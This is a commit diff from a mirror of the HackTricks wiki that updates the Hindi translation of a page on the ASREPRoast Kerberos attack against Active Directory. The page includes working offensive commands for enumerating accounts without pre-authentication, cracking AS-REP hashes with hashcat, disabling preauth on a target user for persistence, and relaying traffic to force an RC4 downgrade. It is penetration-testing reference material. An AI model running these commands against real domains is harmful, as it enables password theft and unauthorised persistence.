mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
parent
ea170224b9
commit
d9f743c7af
@ -4,15 +4,15 @@
|
|||||||
|
|
||||||
## ASREPRoast
|
## ASREPRoast
|
||||||
|
|
||||||
ASREPRoast एक सुरक्षा हमला है जो उन उपयोगकर्ताओं का लाभ उठाता है जिनमें **Kerberos प्री-प्रमाणीकरण आवश्यक विशेषता** नहीं होती। मूल रूप से, यह कमजोरियों हमलावरों को उपयोगकर्ता के लिए डोमेन कंट्रोलर (DC) से प्रमाणीकरण का अनुरोध करने की अनुमति देती है बिना उपयोगकर्ता के पासवर्ड की आवश्यकता के। फिर DC उपयोगकर्ता के पासवर्ड-व्युत्पन्न कुंजी के साथ एन्क्रिप्टेड संदेश के साथ प्रतिक्रिया करता है, जिसे हमलावर ऑफ़लाइन क्रैक करने का प्रयास कर सकते हैं ताकि उपयोगकर्ता का पासवर्ड पता चल सके।
|
ASREPRoast एक सुरक्षा हमला है जो उन उपयोगकर्ताओं का लाभ उठाता है जिनमें **Kerberos पूर्व-प्रमाणीकरण आवश्यक विशेषता** नहीं होती है। मूल रूप से, यह भेद्यता हमलावरों को उपयोगकर्ता के लिए डोमेन कंट्रोलर (DC) से प्रमाणीकरण का अनुरोध करने की अनुमति देती है बिना उपयोगकर्ता के पासवर्ड की आवश्यकता के। फिर DC उपयोगकर्ता के पासवर्ड-व्युत्पन्न कुंजी के साथ एन्क्रिप्टेड संदेश के साथ प्रतिक्रिया करता है, जिसे हमलावर ऑफ़लाइन क्रैक करने का प्रयास कर सकते हैं ताकि उपयोगकर्ता का पासवर्ड पता चल सके।
|
||||||
|
|
||||||
इस हमले की मुख्य आवश्यकताएँ हैं:
|
इस हमले की मुख्य आवश्यकताएँ हैं:
|
||||||
|
|
||||||
- **Kerberos प्री-प्रमाणीकरण की कमी**: लक्षित उपयोगकर्ताओं में यह सुरक्षा विशेषता सक्षम नहीं होनी चाहिए।
|
- **Kerberos पूर्व-प्रमाणीकरण की कमी**: लक्षित उपयोगकर्ताओं में यह सुरक्षा विशेषता सक्षम नहीं होनी चाहिए।
|
||||||
- **डोमेन कंट्रोलर (DC) से कनेक्शन**: हमलावरों को अनुरोध भेजने और एन्क्रिप्टेड संदेश प्राप्त करने के लिए DC तक पहुंच की आवश्यकता होती है।
|
- **डोमेन कंट्रोलर (DC) से कनेक्शन**: हमलावरों को अनुरोध भेजने और एन्क्रिप्टेड संदेश प्राप्त करने के लिए DC तक पहुंच की आवश्यकता होती है।
|
||||||
- **वैकल्पिक डोमेन खाता**: एक डोमेन खाता होने से हमलावरों को LDAP क्वेरी के माध्यम से कमजोर उपयोगकर्ताओं की पहचान करने में अधिक कुशलता मिलती है। बिना ऐसे खाते के, हमलावरों को उपयोगकर्ता नामों का अनुमान लगाना होगा।
|
- **वैकल्पिक डोमेन खाता**: एक डोमेन खाता होने से हमलावरों को LDAP प्रश्नों के माध्यम से कमजोर उपयोगकर्ताओं की पहचान करने में अधिक कुशलता मिलती है। बिना ऐसे खाते के, हमलावरों को उपयोगकर्ता नामों का अनुमान लगाना होगा।
|
||||||
|
|
||||||
#### कमजोर उपयोगकर्ताओं की गणना करना (डोमेन क्रेडेंशियल की आवश्यकता)
|
#### कमजोर उपयोगकर्ताओं की गणना करना (डोमेन क्रेडेंशियल्स की आवश्यकता)
|
||||||
```bash:Using Windows
|
```bash:Using Windows
|
||||||
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
|
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
|
||||||
```
|
```
|
||||||
@ -42,18 +42,18 @@ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
|||||||
```
|
```
|
||||||
### Persistence
|
### Persistence
|
||||||
|
|
||||||
एक उपयोगकर्ता के लिए **preauth** को मजबूर करें जहाँ आपके पास **GenericAll** अनुमतियाँ (या गुण लिखने की अनुमतियाँ) हैं:
|
Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
|
||||||
```bash:Using Windows
|
```bash:Using Windows
|
||||||
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
|
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
```bash:Using Linux
|
```bash:Using Linux
|
||||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
|
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
|
||||||
```
|
```
|
||||||
## ASREProast बिना क्रेडेंशियल्स
|
## ASREProast बिना क्रेडेंशियल्स
|
||||||
|
|
||||||
एक हमलावर मैन-इन-द-मिडल स्थिति का उपयोग करके AS-REP पैकेट्स को कैप्चर कर सकता है जब वे नेटवर्क के माध्यम से यात्रा करते हैं बिना Kerberos प्री-ऑथेंटिकेशन के बंद होने पर निर्भर किए। इसलिए, यह VLAN पर सभी उपयोगकर्ताओं के लिए काम करता है।\
|
एक हमलावर मैन-इन-द-मिडल स्थिति का उपयोग करके AS-REP पैकेट्स को नेटवर्क पर यात्रा करते समय कैप्चर कर सकता है बिना Kerberos प्री-ऑथेंटिकेशन के बंद होने पर निर्भर किए। इसलिए, यह VLAN पर सभी उपयोगकर्ताओं के लिए काम करता है।\
|
||||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) हमें ऐसा करने की अनुमति देता है। इसके अलावा, यह उपकरण क्लाइंट वर्कस्टेशनों को Kerberos वार्ता को बदलकर RC4 का उपयोग करने के लिए मजबूर करता है।
|
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) हमें ऐसा करने की अनुमति देता है। इसके अलावा, यह उपकरण क्लाइंट वर्कस्टेशनों को Kerberos बातचीत को बदलकर RC4 का उपयोग करने के लिए मजबूर करता है।
|
||||||
```bash
|
```bash
|
||||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
|
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
|
||||||
ASRepCatcher relay -dc $DC_IP
|
ASRepCatcher relay -dc $DC_IP
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user